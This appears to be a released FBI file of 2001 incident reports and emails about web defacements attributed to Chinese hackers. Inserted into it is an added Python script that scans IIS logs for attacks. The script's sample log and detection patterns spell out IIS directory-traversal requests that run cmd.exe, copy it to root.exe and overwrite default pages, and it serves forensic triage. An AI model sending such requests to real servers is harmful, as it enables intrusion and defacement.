but I did see an email that was out of character to


beendownb4@pinkponys.com


I have since updated my virus definitions and ran NAV on all my server hard
drives with no virus found.


Thank you for your help


Sincerely,
[redacted]
DSX Access Systems, Inc.


----- Original Message -----
From: <infragard_dallas@yahoo.com>
To: [redacted]        b6
Sent: Thursday, May 10, 2001 6:04 PM        b7C
Subject: Web site defacement


> I read over your computer intrusion report and it
> resembles the "worm" advisory reported on
> www.cert.org:
> CA-2001-11 sadmind/IIS.
>
> Take a look at the advisory and call me on Monday with
> more details.
>
> [redacted]
> Intelligence Research Specialist
> Dallas - FBI
> 214-720-2200
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From: : - ! : j Wu rur 
To: 

Date: Thu, May 17, 2001 7:01 PM 

Subject: ncident Report 051701 012 41993 


The following incident report was received on the nipc.watch@fbi.gov e-mail account. It is being 
forwarded for your information/action. It may involved Chinese Hackers. 


Regards, 
NIPC Watch and Warning Unit. 


Subject: Cyber Incident Report Form 

Date: Thu, 17 May 2001 14:22:09 -0500 

From: b6 
To: “nipc.watch@fbi.gov" <nipc.watch@fbi.gov> . b7C 


Report_date_time=17-May-2001/14:11 
Name= 
Title= 
Telephone_Fax_Number= 
Email= 
Organization=Richmont 
Addrs_Street=17855 Dallas Pkwy. 
City=Dallas 
State=TX 
Zip Code=75287 
Country=U.S. 
Question1_Organization=SAME 
Question1_Contact_Info=SAME 
Question1_Tele_Number=SAME 
Question1_Street=SAME 
Question1_City_State_Zipcd= 
Question1_Country= 
Question1_Email= 
Question2_Location=Same address as indicated above. 
Question3_Date_Time=14-May-2001 14:40 
Question4_Critical=Yes 
Question5_crit_infrasture=Other 
Question5_Remarks=Production Email System 
Question6_nature_of_prob=Intrusion 
Question6_nature_of_prob=Unauthorized root access 
Question6_nature_of_prob=Web site defacement 
Question6_nature_of_prob=Compromise of system integrity 
Question6_nature_of_prob=Unknown 
Question6_other= 
Question7_exp_problem=No 
Question7_Remarks=No Remarks 
Question8_method_of_attack=Unknown 
Question8_Remarks=No Remarks 
Question9_sus_perpetrators=Other 
Question9_Remarks=NIPC Warning 01-005 
Question10_ip_addrs=146.153.1.15 
Question11_evid_of_spoof=Unknown 
Question12_oper_systems=NT 
Question12_Remarks=No Remarks 
Question13_security_infrasture=Firewall 
Question13_security_infrasture=Intrusion Detection System 
Question13_security_infrasture=Packet filtering 
Question14_attack_loss_info=Unknown 
Question14_Remarks=No Remarks 
Question15_damage_systms=No 
Question15_Remarks=No Remarks 
Question16_what_actions=Log files examined 
Question16_Remarks=No Remarks 
Question17_Field_Office= 
Question17_fieldoff_inform=No 
Question18_agency_inform=No 
Question18_State_local_Police= 
Question18_Inspector_General= 
Question18_CERT-CC= 
Question18_FedCIRC= 
Question18_JTF-CND= 
Question18_Other= 
Question19_date_of_last_update= 
Question19_org_work_update= 
Question20_POC_Information= 
Question20_sys_adm_contract=No 
Question21_remarks=Intruder has placed multiple HTML files on a Web server 
root directory and other places. The content of such files displays 
profanity toward the US, and an organization. 


The traceroute to the origin is alive and as follows: 

Tracing route to leonera.puc.cl [146.155.1.15] 
over a maximum of 30 hops: 

  1   130 ms   120 ms   120 ms  tnt-dal.dallas.net [209.44.40.10] 
  2   120 ms   110 ms   110 ms  grf-dal-ge002.dallas.net [209.44.40.9] 
  3   120 ms   120 ms   120 ms  atm9-0-04.CR-1.usdlls.savvis.net [209.44.32.9] 
  4   120 ms   120 ms   111 ms  at-1-2-01004.usdlls2-j20c.savvis.net [64.241.111.173] 
  5   321 ms   210 ms   130 ms  frontier.usdlls.savvis.net [208.48.18.1] 
  6   110 ms   110 ms   110 ms  pos2-2-155M.cr2.DAL1.gblx.net [206.132.251.69] 
  7   150 ms   150 ms   150 ms  so2-0-0-2488M.cr2.MIA1.gblx.net [206.132.248.137] 
  8   150 ms   150 ms   151 ms  sot-0-0-622M.ar2.MIA1.gblx.net [206.132.248.122] 
  9   150 ms   151 ms   160 ms  AdexusSA.ge-0-1-0.101.ar2.MIA1.gblx.net [64.209.252.166] 
 10   301 ms   300 ms   311 ms  64213242 (host name and address illegible in the source) 
 11   301 ms   310 ms   301 ms  cisco-rs92-sj.puc.cl [146.155.92.9] 
 12   320 ms   311 ms   300 ms  leonera.puc.cl [146.155.1.15] 
WELCOME TO RICHMONT 

[Site navigation: INVESTMENT FUNDS / CHAIRMAN'S LETTER / PHILOSOPHY] 

Richmont is a marketing-focused merchant bank, which creates value by wisely managing private 
assets in the form of various diverse operating companies, reducing debt and investing earnings in 
high quality investment vehicles that we control. 

Richmont is a family of companies in a variety of business categories, representing more than two 
billion dollars in assets. 

Richmont is a team of talented professionals with experience across a wide range of disciplines, who 
use their considerable skills to develop and implement business solutio 

Richmont is an 

responsibility. 

Richmont directly reaches more than 25 million consumers through 
channels, including retail, direct sales and the Internet. Through our ct 
marketing and distribution, Richmont can reach almost every female c 
the United States. 

Richmont is a unique blend of synergies among our companies, our 
technology and our business strategies. 

Richmont combines a multi-billion dollar, international presence witl 
of an entrepreneur. 

Richmont has deep roots while at the same time we are perfectly at 
the new economy of the 21st century. 

Richmont                          New York: 
17855 Dallas Parkway              660 Madison Avenue 
Dallas, TX 75287                  15th Floor 
phone: 972-860-7500               New York, NY 10021 
                                  phone: 212-835-205C 
                                  fax: 212-835-2020 

Toronto: 
3300 Bloor Street We 
West Tower, Suite 75 
Ontario MSX 2X2 
phone: 416-234-0734 
fax: 416-234-0993 

Hong Kong: 
19/F., South Cornwall 
Taikoo Place, 979 Kin. 
Quarry Bay, Hong Kor 
phone: 011-852-252C 
fax: 011-852-2527-8: 

http://www.richmont.com/ 5/21/01 
FEDERAL BUREAU OF INVESTIGATION 
Precedence: ROUTINE Date: 05/18/2001 
To: Chicago Attn: SA 
From: Philadelphia 
Squad 9 
Contact: SA 215-418-4313 
Approved By: 
Drafted By: 
Case ID #: (Pending) 

Title: Honkers Union of China; 
Chicago Systems Group - Victim; 
Intrusion - Other 

Synopsis: Identifying victim organizations for the above 
captioned investigation. 

Enclosure(s): NIPC Incident Reports, FD-71 reports, email 
complaints, and one (1) insert report covering the complaints 
collected by the Philadelphia FBI concerning the Chinese hacker 
attacks occurring as of May 18, 2001. 

Details: Philadelphia FBI has received several complaints and 
has identified victims concerning the above investigation. Below 
is a list of victims of the web defacement attack occurring in 
the Philadelphia FBI territory since May 18, 2001: 

1.) MAC DIRECT c/o [ ] 
185 Discovery Drive 
Colmar, PA 18915 
(cell) [ ] 

2.) MORAVIAN COLLEGE c/o [ ] 
120 West Greenwich Street 

3.) PALISADES SCHOOL DISTRICT c/o [ ] 
39 Thomas Free Drive 
Kintnersville, PA 18930 
(610) 847-5131 ext. [ ] 

b3 
b7E 

4.) SOLUTION SYSTEMS INC. c/o [ ] 
114 Forest Avenue 
[ ] 

To: Chicago From: Philadelphia 
Re: [ ] 05/18/2001 

.) CONCORDE INC. c/o [ ] 
1835 Market Street 
12th Floor 
Philadelphia, PA 19103 

.) UNIGLOBE/WINGS TRAVEL c/o [ ] 
6198 Butler Pike 
Blue Bell, PA 

.) TOPLINK Inc. c/o [ ] 
103 East Pennsylvania Blvd. 
Feasterville, PA 19053 

.) CRW GRAPHICS INC. c/o [ ] 
9100 Pennsauken Highway 
Pennsauken, NJ 08110 

.) DILWORTH PAXSON, LLP c/o [ ] 
1735 Market Street 
Philadelphia, PA 19103 

.) PHILADELPHIA UNIVERSITY c/o [ ] 

.) VILLAGEAUCTION.COM c/o [ ] 
200 Innovation Blvd. 
-o Park, PA 16803 

.) [ ] c/o [ ] 
650 Wilson Lane 

b7E 

.) [ ] Corporation c/o [ ] 
950 Tilton Road 
Northfield, NJ 08225 

.) Commonwealth of Pennsylvania c/o [ ] 
Commonwealth Technology Center 
(609) 641-7500 ext. [ ] 

.) Open Systems Solutions, Inc. c/o [ ] 
710 Floral Vale Blvd 
PA 19067 

.) Prince Law Offices c/o [ ] 
42 South 5th Street 
Reading, PA 19602 
(610) 375-8425 

.) Miller's Capital Insurance c/o [ ] 
805 North Front Street 
PA 17102 

.) Deloitte Consulting Group c/o [ ] 
3600 Vartan Way 
Harrisburg, PA 17110 
(717) 651-2858 ext. [ ] 

.) APR Supply Company c/o [ ] 
305 North 5th Street 
PA 17022 

.) [ ] 
1 Technology Park 
PA 

.) Na[ ] Depot (Naval Criminal Investigative Service) 

.) Pennsylvania State University c/o [ ] 
Harrisburg Campus 
Harrisburg, PA 

.) Strafford Mechanical, [ ] 
37 Industrial Blvd. 
[ ] 

b3 
b7E 

.) [ ] c/o [ ] 
820 Town Center Drive 
PA 19047 

Philadelphia FBI considers this matter ongoing and will 
forward any additional and related incidents to Chicago FBI. 


LEAD(s): 
Set Lead 1: (Adm) 
CHICAGO 
AT CHICAGO, ILLINOIS 

Read and clear. 

++ 
FD-71 (Rev. 3-27-95) 
Complaint Form 

NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: [X] Negative [ ] See below 

Subject's name and aliases: UNSUB; 
UNIGLOBE/WINGS TRAVEL, 
6198 BUTLER PIKE, 
BLUE BELL, PA. - VICTIM 

Character of case: COMPUTER CRIMES 

Complainant: [ ], UNIGLOBE/WINGS TRAVEL 

Complaint received: [ ] Personal [ ] Telephonic   Date 05/09/2001   Time 1:00 pm. 

Address of Subject: 

Complainant's address and telephone number: [ ] Pike, Blue Bell, Pa. 

Complainant's DOB: 
Subject's Description: 
Scars, marks and other data: 
Employer / Address / Telephone: 
Vehicle Description: 

Facts of Complaint 

[ ], Uniglobe/Wings Travel, Blue Bell, PA, telephonically advised that on 05/07/2001, at approximately 8:30 
a.m., his company discovered their web page on the Internet had been 
"hacked" with anti-government slogans. [ ] advised this intrusion 
was discovered when he automatically accessed his home page on 
05/07/2001. [ ] gave the following answers to specific questions 
concerning this intrusion: 

Was connection logging active? Yes 

Do not write in this space. 
(Complaint received by)   BLOCK STAMP 

Can you provide copies of all logs dating 48 hours 
before the intrusion was detected? Probably 

What is the network topography? Unknown 

Where does the accessed equipment reside? 
Blue Bell, Pa. 

Who has access to the equipment? 
Remotely? All employees (18) in the office can 
access their Intranet site from home. 
Physically? All employees (18) 

What type of system was intruded upon? 
Operating System: Windows 2000 
Hardware: Dell and various others 

What is the password scheme (alphanumeric)? 
Downloaded from Internet "Authextix" 

How much loss was incurred? 
Damage amount: None 
Cost for repairs: Unknown 
Outside services: Unknown 
Man hours multiplied by salary: Unknown 

Are any of the ports bannered? Unknown 

Was any email threatening or reporting the intrusion 
received? No 

Are copies available? Has copy of executed script 

Who is your upstream and downstream Internet provider? 
Rhythms is their DSL 

Were any programs installed on the intruder system? 
Unknown 

Are copies of the programs available? Unknown 

Was the intruded computer's hard drive removed and 
stored for examination? No 

[ ] informed this incident would be made a b6 
matter of record. b7C 


From: NIPC-WATCH 
To: 
Date: 5/12/01 2:39AM 
Subject: Re: Web Defacement 

Hello, 

Sorry for the mix up, you should have received this web site defacement. 
Thanks 

Subject: Cyber Incident Report Form 

Date: Fri, 11 May 2001 10:50:43 -0400 
From: b6 
To: <nipc.watch@fbi.gov> b7C 

Report_date_time=5/11/01 
Name= 
Title= 
Telephone= 
Email= 
Organization=Solution Systems Inc. 
Addrs_Street=114 Forrest Ave 
City=Narberth 
State=PA 
Zip Code=19072 
Country=usa 
Question1_Organization=SAME 
Question1_Contact_Info=SAME 
Question1_Tele_Number=SAME 
Question1_Street=SAME 
Question1_City_State_Zipcd=SAME 
Question1_Country=SAME 
Question1_Email=SAME 
Question2_Location=Computer network located at the above address, in 
locked / protected computer room. 
Question3_Date_Time=5/5/01 - 5/7/01 
Question4_Critical=Yes 
Question5_crit_infrasture=Not Applicable 
Question5_Remarks=No Remarks 
Question6_nature_of_prob=Web site defacement 
Question6_other= 
Question7_exp_problem=No 
Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 
Question8_Remarks=Windows 2k / IIS 5.0 vulnerabilities were exploited. 
Specifically with regard to Microsoft Security Article MS01-023 
Question9_sus_perpetrators=Unknown 
Question9_Remarks=No Remarks 
Question10_ip_addrs=210.111.114.15 and 208.247.158.103 
Question11_evid_of_spoof=Unknown 
Question12_oper_systems=NT 
Question12_oper_systems=Windows 
Question12_Remarks=No Remarks 
Question13_security_infrasture=Firewall 
Question14_attack_loss_info=Unknown 
Question14_Remarks=No Remarks 
Question15_damage_systms=Yes 
Question15_Remarks=The intrusion replaced the default.htm / default.asp 
pages on numerous websites 
Question16_what_actions=System(s) disconnected from the network 
Question16_what_actions=Other 
Question16_what_actions=Log files examined 
Question16_Remarks=Applied all recommended Microsoft security patches 
Question17_Field_Office= 
Question17_fieldoff_inform=No 
Question18_agency_inform=No 
Question18_State_local_Police= 
Question18_Inspector_General= 
Question18_CERT-CC= 
Question18_FedCIRC= 
Question18_JTF-CND= 
Question18_Other= 
Question19_date_of_last_update=5/4/01 
Question19_org_work_update=self 
Question20_POC_Information= 
Question20_sys_adm_contract=No 
Share Info With=Infrastructure Orgs 
Question21_remarks=On or about 5/5/01, an unknown user maliciously 
changed the default pages on at least 3 websites. These new pages 
contained defamatory comments against the US government. 

>>> [ ] 5/11 4:50 PM >>> 
this victim is located in Michigan, not PH. 

>>> NIPC-WATCH 05/11/01 12:00PM >>> 
Subject: Cyber Incident Report Form 

Date: Fri ...:04:59 +0000 (GMT) 
From: <webmaster@triton.net> 
To: <nipc.watch@fbi.gov> 

Report_date_time=...001 - 10:50 AM 
Name= 
Title= 
Telephone_Fax_Number= 
Email=webmaster@triton.net 
Organization=Triton Technologies Inc. 
Addrs_Street=4009 Plainfield Ave. NE 
City=Grand Rapids 
State=Michigan 
Zip Code=49525 
Country=USA 
Question1_Organization=SAME 
Question1_Contact_Info= 
Question1_Tele_Number= 
Question1_Street=SAME 
Question1_City_State_Zipcd=SAME 
Question1_Country=SAME 
Question1_Email=SAME 
Question2_Location=Back room where all the servers are located. 
Question3_Date_Time=5/8/2001 - 5:14 AM 
Question4_Critical=No 
Question5_crit_infrasture=Not Applicable 
Question5_Remarks=No Remarks 
Question6_nature_of_prob=Web site defacement 
Question6_other= 
Question7_exp_problem=No 
Question7_Remarks=To view what was done go to http://webmaster.triton.net/hacked/ 
Question8_method_of_attack=Vulnerability exploited 
Question8_Remarks=Microsoft Windows 2000 IIS 5.0 exploited. Info located @ 
http://www.eeye.com/html/Research/Advisories/AD20010501.html 
Question9_sus_perpetrators=Other 
Question9_Remarks=The Chinese and American computer hacking wars. 
Question10_ip_addrs=Unknown. IIS crashed so it logged nothing. 
Question11_evid_of_spoof=Unknown 
Question12_oper_systems=Windows 
Question12_Remarks=Windows 2000 Pro 
Question14_attack_loss_info=No 
Question14_Remarks=No Remarks 
Question15_damage_systms=Yes 
Question15_Remarks=Files were overwritten with the ones the person uploaded defacing the web sites. 
Question16_what_actions=Backup of affected system(s) 
Question16_what_actions=Other 
Question16_what_actions=Log files examined 
Question16_Remarks=Patched IIS 5.0 with a fix that Microsoft has released. Also installed a firewall to 
log anything that might happen again. 
Question17_Field_Office= 
Question17_fieldoff_inform=No 
Question18_agency_inform=No 
Question18_State_local_Police= 
Question18_Inspector_General= 
Question18_CERT-CC= 
Question18_FedCIRC= 
Question18_JTF-CND= 
Question18_Other= 
Question19_date_of_last_update=5/11/2001 - Present Time 
Question19_org_work_update= 
Question20_POC_Information= 
Question20_sys_adm_contract=No 
Share Info With=Public 
Question21_remarks=I have no evidence who did the hacking. No logged IP addresses of any kind. I do 
have everything back up and working now. I just felt I should report this so it could be on some sort of 
record. 
Also the computer is located at a state wide ISP in Michigan. 


From: NIPC-WATCH 
To: 
Date: 5/8/01 7:11PM 
Subject: China Intrusion 

Watch received the following incident report for [ ] Palisades School District, 39 Thomas b6 
Free Drive, Kintnersville, PA 18930 which was forwarded to: SSA [ ] CIU and SSA b7C 
[ ] Philadelphia Field Office. Serial number: 050801-011-41540. 

NIPC Watch 

Subject: Cyber Incident Report Form 
Date: ...51:45 - 
From: b6 
To: "nipc.watch@fbi.gov" <nipc.watch@fbi.gov> b7C 

Report_date_time=May 8, 2001 
Name= 
Title= 
Telephone_Fax_Number=610-847-5131 ext[ ] 
Email= 
Organization=Palisades School District 
Addrs_Street=39 Thomas Free Drive 
City=Kintnersville 
State=Pennsylvania 
Zip Code=18930 
Country=US 
Question1_Organization=SAME 
Question1_Contact_Info= 
Question1_Tele_Number= 
Question1_Street=SAME 
Question1_City_State_Zipcd= 
Question1_Country= 
Question1_Email= 
Question2_Location=Durham Nockamixon Elementary School at the address listed 
above in the District Office. 
Question3_Date_Time=May 5, 2001 at 11:00 am 
Question4_Critical=No 
Question5_crit_infrasture=Not Applicable 
Question5_Remarks=No Remarks 
Question6_nature_of_prob=Intrusion 
Question6_nature_of_prob=System impairment/denial resources 
Question6_nature_of_prob=Compromise of system integrity 
Question6_nature_of_prob=Damage 
Question6_other= 
Question7_exp_problem=No 
Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 
Question8_Remarks=The perpetrator used a security flaw in Microsoft's 
Internet Information Server to delete executable files from DNS/e-mail 
server harddrives. 
Question9_sus_perpetrators=Other 
Question9_Remarks=Chinese hacker, as was indicated by a message left by the 
perpetrator. 
Question10_ip_addrs=62.226.240.247 
Question11_evid_of_spoof=Unknown 
Question12_oper_systems=NT 
Question12_Remarks=No Remarks 
Question13_security_infrasture=Secure Remote Access/Authorization tools 
Question13_security_infrasture=Security Auditing Tools 
Question13_security_infrasture=Packet filtering 
Question14_attack_loss_info=No 
Question14_Remarks=No Remarks 
Question15_damage_systms=Yes 
Question15_Remarks=Enough executables were deleted from the systems to 
require a total re-installation, and restore from backup. I've left one of 
the two systems as is, just in case someone wants to check it out. 
Question16_what_actions=Other 
Question16_what_actions=Log files examined 
Question16_Remarks=One of the systems has been totally re-installed, and 
security patches have been applied to all systems accessing the internet. 
Question17_Field_Office= 
Question17_fieldoff_inform=No 
Question18_agency_inform=No 
Question18_State_local_Police= 
Question18_Inspector_General= 
Question18_CERT-CC= 
Question18_FedCIRC= 
Question18_JTF-CND= 
Question18_Other= 
Question19_date_of_last_update=May 3, 2001 
Question19_org_work_update=Same as POC info above. 
Question20_POC_Information= 
Question20_sys_adm_contract=No 
Share Info With=Public 
Share Info With=Infrastructure Orgs 
Question21_remarks=No additional remarks 
To: 
Date: 5/4/01 8:26AM 
Subject: Incident report #050301 008 41241 

[ ] regarding a possible web [ ] 
[ ] handling Chinese e-mails 
FBI/NIPC Philadelphia, and CC a [ ] 

The watch received the following e-mail via nipc.watch acct. from a 
[ ] forwarded information to 
[ ]; one copy was sent to S[ ] 
copy to [ ] 

Incident Report #05[ ] 

Subject: Cyber Incident Report Form 
Date: Thu, 3 May 2001 14:09:52 -0400 
From: 
To: "nipc.watch@fbi.gov" <nipc.watch@fbi.gov> 

Report_date_time=05/03/2001 - 13:52 
Organization=Moravian College 
Addrs_Street=120 W. Greenwich St / CIT 
City=Bethlehem 
State=PA 
Zip Code=18018 
Country=USA 
Question1_Organization=SAME 
Question1_Contact_Info= 
Question1_Tele_Number= 
Question1_Street=SAME 
Question1_City_State_Zipcd= 
Question1_Country= 
Question1_Email= 
Question2_Location=Moravian College 
Comenius Hall / Room C-4 
1200 Main Street 
Bethlehem, PA 18018 
Question3_Date_Time=05/02/2001 - 5:04PM - 5:30PM 
Question4_Critical=No 
Question5_crit_infrasture=Other 
Question5_Remarks=Educational 
Question6_nature_of_prob=Web site defacement 
Question6_other= 
Question7_exp_problem=No 
Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 
Question8_Remarks=Vulnerability in IIS exploited. Attacker accessed a 
directory (/scripts) and was able to get a command prompt. Copied html 
pages to server with anti-US government statements signed with a Chinese 
e-mail address. That *appears* to be the extent of the "damage". 
Question9_sus_perpetrators=Other 
Question9_Remarks=Apparent source IP address is in Japan. Attacker unknown. 
Motive - anti-US statements due to tensions between China and the US. 
Question10_ip_addrs=210.230.128.198 
Question11_evid_of_spoof=No 
Question12_oper_systems=NT 
Question12_Remarks=Windows NT, SP5, IIS, Outlook Web Access. 
Question13_security_infrasture=Firewall 
Question14_attack_loss_info=Unknown 
Question14_Remarks=No Remarks 
Question15_damage_systms=Yes 
Question15_Remarks=We are going to rebuild the computer. The html files 
were damaged, we aren't sure of the extent of the intrusion to the system or 
our network (even though it appears to be limited to just changing html 
files). 
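The reports in this file describe two IIS attack paths over and over: the /scripts directory traversal that hands the attacker a command prompt (Moravian College above; it is the Microsoft "Web Server Folder Traversal" bug, MS00-078, that the sadmind/IIS worm in CERT CA-2001-11 used to rewrite index and default pages), and the IIS 5.0 .printer ISAPI overflow (MS01-023, eEye AD20010501) that Solution Systems and Triton name. MAC DIRECT later singles out one source address "based in IIS logs". As an added example that is not part of the FBI file and not any victim's tooling, the script below does that triage over an IIS W3C extended log: it tags each request that matches one of those patterns and aggregates hits by client address. The log lines are constructed for the example, and the encoding list is a representative subset rather than a complete signature set. One caveat comes straight from Triton's report ("IIS crashed so it logged nothing"): IIS writes the log entry after the response, so a .printer request that crashed inetinfo.exe never appears, and an empty result is not evidence of absence.

```python
"""Triage an IIS W3C extended log for the 2001 defacement request patterns.
Added example; not the FBI file's or any victim's tooling."""
import re
from collections import defaultdict

# Constructed sample log in IIS 4.0/5.0 W3C extended format. These lines are
# made up for the example and are not from any victim's server.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 4.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-05-05 12:11:02 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-05-05 12:11:04 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+root.exe 502
2001-05-05 12:11:09 192.0.2.10 GET /scripts/root.exe /c+echo+defaced+>+default.htm 502
2001-05-05 12:12:40 198.51.100.7 GET /index.htm - 200
2001-05-05 12:13:01 203.0.113.5 GET /NULL.printer - 200
2001-05-05 12:20:15 198.51.100.7 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 404
"""

# Each rule is (tag, regex) applied to the lower-cased "stem?query".
RULES = [
    # MS00-078: overlong UTF-8 that IIS decoded to '/' or '\' after its path
    # check (%c0%af = '/', %c1%1c and %c1%9c = '\'), the technique the
    # sadmind/IIS worm in CA-2001-11 used. Representative subset only; the
    # double-decode forms (%255c, %%35c) are included as well.
    ("unicode-traversal",
     re.compile(r"%c0%af|%c1%1c|%c1%9c|%e0%80%af|%255c|%%35c")),
    # Reaching cmd.exe through the traversal, or a copy of it (root.exe is
    # the conventional name attackers gave a copied cmd.exe).
    ("cmd-exec", re.compile(r"(cmd|root)\.exe")),
    # Shell redirection into one of the four start pages the defacers replaced.
    ("page-write", re.compile(r">\+?(index|default)\.(htm|asp)")),
    # MS01-023 / eEye AD20010501: the IIS 5.0 .printer ISAPI overflow. A
    # request that crashed inetinfo.exe is never written to the log, so this
    # only catches probes and failed attempts.
    ("printer-isapi", re.compile(r"\.printer(\?|$)")),
]


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in #Fields."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("request line before #Fields header")
        parts = line.split()
        if len(parts) != len(fields):
            continue  # truncated line (e.g. cut off by a crash): skip it
        yield dict(zip(fields, parts))


def classify(entry):
    """Return the set of rule tags matching one request."""
    target = (entry.get("cs-uri-stem", "") + "?"
              + entry.get("cs-uri-query", "-")).lower()
    return {tag for tag, rx in RULES if rx.search(target)}


def triage(text):
    """Per client IP: tags seen, number of matching requests, first timestamp.
    Non-2xx responses are kept on purpose: a 404 still records the attempt,
    and IIS answers 502 when cmd.exe output carries no HTTP headers, so a 502
    does not mean the command failed."""
    hits = defaultdict(lambda: {"tags": set(), "requests": 0, "first_seen": None})
    for entry in parse_w3c(text):
        tags = classify(entry)
        if not tags:
            continue
        rec = hits[entry["c-ip"]]
        rec["tags"] |= tags
        rec["requests"] += 1
        stamp = entry["date"] + " " + entry["time"]
        if rec["first_seen"] is None or stamp < rec["first_seen"]:
            rec["first_seen"] = stamp
    return dict(hits)


def suspect_sources(text):
    """Addresses to hand to the ISP or NIPC, most active first."""
    hits = triage(text)
    return sorted(hits, key=lambda ip: (-hits[ip]["requests"], hits[ip]["first_seen"]))


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG)
    for ip in suspect_sources(SAMPLE_LOG):
        rec = hits[ip]
        print(ip, rec["requests"], rec["first_seen"], sorted(rec["tags"]))
```

Run it against a real log by replacing SAMPLE_LOG with the file contents; the #Fields header is read from the log itself, so logs with extra columns (cs(User-Agent), time-taken) parse unchanged. The per-address summary is what the complainants here were asked for, and keeping the 404 and 502 hits is what distinguishes a scan that failed from one that got through.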


To: 
Date: 5/6/01 5:06PM 
Subject: Incident Report 050601 002 41371 

Subject: Cyber Incident Report Form 
Date: Sun, 6 May 2001 14:49:52 -0400 
From: 
To: "nipc.watch@fbi.gov" <nipc.watch@fbi.gov> 

Report_date_time=May 6, 2001 2:40 PM 
Organization=MAC DIRECT 
Addrs_Street=185 Discovery Dr. 
City=Colmar 
State=PA 
Zip Code=18915 
Country=USA 
Question1_Organization=SAME 
Question1_Contact_Info= 
Question1_Tele_Number= 
Question1_Street=SAME 
Question1_City_State_Zipcd= 
Question1_Country= 
Question1_Email= 
Question2_Location=Computer room located at 185 Discovery Dr. 
Question3_Date_Time=Incident 1: 12:15 PM 5/5/2001 Incident 2: 3:0 
Question4_Critical=Yes 
Question5_crit_infrasture=Other 
Question5_crit_infrasture=Telecommunications 
Question5_Remarks=Merck-Medco Formulary Web Site 
Question6_nature_of_prob=Intrusion 
Question6_nature_of_prob=System impairment/denial resources 
Question6_nature_of_prob=Unauthorized root access 
Question6_nature_of_prob=Web site defacement 
Question6_nature_of_prob=Compromise of system integrity 
Question6_other= 
Question7_exp_problem=No 
Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 
Question8_method_of_attack=Distributed Denial of Service 
Question8_Remarks=MS Hotfix that was applied but not active. 
Question9_sus_perpetrators=Other 
Question9_Remarks=PoizonBox 
Question10_ip_addrs=Multiple sources 
Question11_evid_of_spoof=No 
Question12_oper_systems=NT 
Question12_Remarks=Check email. 
Question13_security_infrasture=Incident/Emergency Response Team 
Question13_security_infrasture=Encryption 
Question13_security_infrasture=Firewall 
Question13_security_infrasture=Secure Remote Access/Authorization tools 
Question13_security_infrasture=Security Auditing Tools 
Question13_security_infrasture=Access Control Lists 
Question13_security_infrasture=Packet filtering 
Question14_attack_loss_info=No 
Question14_Remarks=No Remarks 
Question15_damage_systms=No 
Question15_Remarks=No Remarks 
Question16_what_actions=System Binaries checked 
Question16_what_actions=Backup of affected system(s) 
Question16_what_actions=Other 
Question16_what_actions=Log files examined 
Question16_Remarks=Worked with ISP (VoiceNet) to mitigate DDOS 
Question17_Field_Office= 
Question17_fieldoff_inform=No 
Question18_agency_inform=No 
Question18_State_local_Police= 
Question18_Inspector_General= 
Question18_CERT-CC= 
Question18_FedCIRC= 
Question18_JTF-CND= 
Question18_Other= 
Question19_date_of_last_update=5/1/2001 
Question19_org_work_update=My staff. 
Question20_POC_Information= 
Question20_sys_adm_contract=No 
Share Info With=Infrastructure Orgs 
Question21_remarks=Please check email to follow. 
Subject: Cyber Incident Report Form 
Date: Sun, 6 May 2001 14:42:31 -0400 
From: b6 
To: "nipc.watch@fbi.gov" <nipc.watch@fbi.gov> b7C 

Report_date_time=May 6, 2001 2:40 PM 
Organization=MAC DIRECT 
Addrs_Street=185 Discovery Dr. 
City=Colmar 
State=PA 
Zip Code=18915 
Country=USA 
Question1_Organization=SAME 
Question1_Contact_Info= 
Question1_Tele_Number= 
Question1_Street=SAME 
Question1_City_State_Zipcd= 
Question1_Country= 
Question1_Email= 
Question2_Location=Computer room located at 185 Discovery Dr. 
Question3_Date_Time=Incident 1: 12:15 PM 5/5/2001 Incident 2: 3:0 
Question4_Critical=Yes 
Question5_crit_infrasture=Other 
Question5_crit_infrasture=Telecommunications 
Question5_Remarks=Merck-Medco Formulary Web Site 
Question6_nature_of_prob=Intrusion 
Question6_nature_of_prob=System impairment/denial resources 
Question6_nature_of_prob=Unauthorized root access 
Question6_nature_of_prob=Web site defacement 
Question6_nature_of_prob=Compromise of system integrity 
Question6_other= 
Question7_exp_problem=No 
Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 
Question8_method_of_attack=Distributed Denial of Service 
Question8_Remarks=MS Hotfix that was applied but not active. 
Question9_sus_perpetrators=Other 
Question9_Remarks=PoizonBox 
Question10_ip_addrs=Multiple sources 
Question11_evid_of_spoof=No 
Question12_oper_systems=NT 
Question12_Remarks=Windows NT 4.0 sp6.0a, IIS 4.0, all post service pack 
hotfixes applied. Hotfix that appears to have failed is described at: 
http://www.microsoft.com/technet/security/bulletin/fq00-086.asp 
Question13_security_infrasture=Incident/Emergency Response Team 
Question13_security_infrasture=Encryption 
Question13_security_infrasture=Firewall 
Question13_security_infrasture=Secure Remote Access/Authorization tools 
Question13_security_infrasture=Security Auditing Tools 
Question13_security_infrasture=Access Control Lists 
Question13_security_infrasture=Packet filtering 
Question14_attack_loss_info=No 
Question14_Remarks=No Remarks 
Question15_damage_systms=No 
Question15_Remarks=No Remarks 
Question16_what_actions=System Binaries checked 
Question16_what_actions=Backup of affected system(s) 
Question16_what_actions=Other 
Question16_what_actions=Log files examined 
Question16_Remarks=Worked with ISP (VoiceNet) to mitigate DDOS 
Question17_Field_Office= 
Question17_fieldoff_inform=No 
Question18_agency_inform=No 
Question18_State_local_Police= 
Question18_Inspector_General= 
Question18_CERT-CC= 
Question18_FedCIRC= 
Question18_JTF-CND= 
Question18_Other= 
